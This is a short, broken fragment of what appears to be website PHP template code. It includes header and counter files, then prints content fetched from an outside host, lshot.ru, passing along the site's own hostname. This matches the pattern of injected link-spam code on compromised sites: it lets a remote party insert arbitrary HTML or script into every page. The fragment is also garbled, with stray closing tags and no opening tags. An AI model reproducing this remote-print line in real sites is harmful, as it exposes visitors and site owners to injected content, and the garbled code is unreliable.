$__DIR__ = $_SERVER['DOCUMENT_ROOT'];
include ($__DIR__ . '/user_includes/head.php');
?>
$__DIR__ = $_SERVER['DOCUMENT_ROOT'];
include ($__DIR__ . '/user_includes/counters.php');
?>
print file_get_contents('http://lshot.ru/clients?site=' . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST']); ?>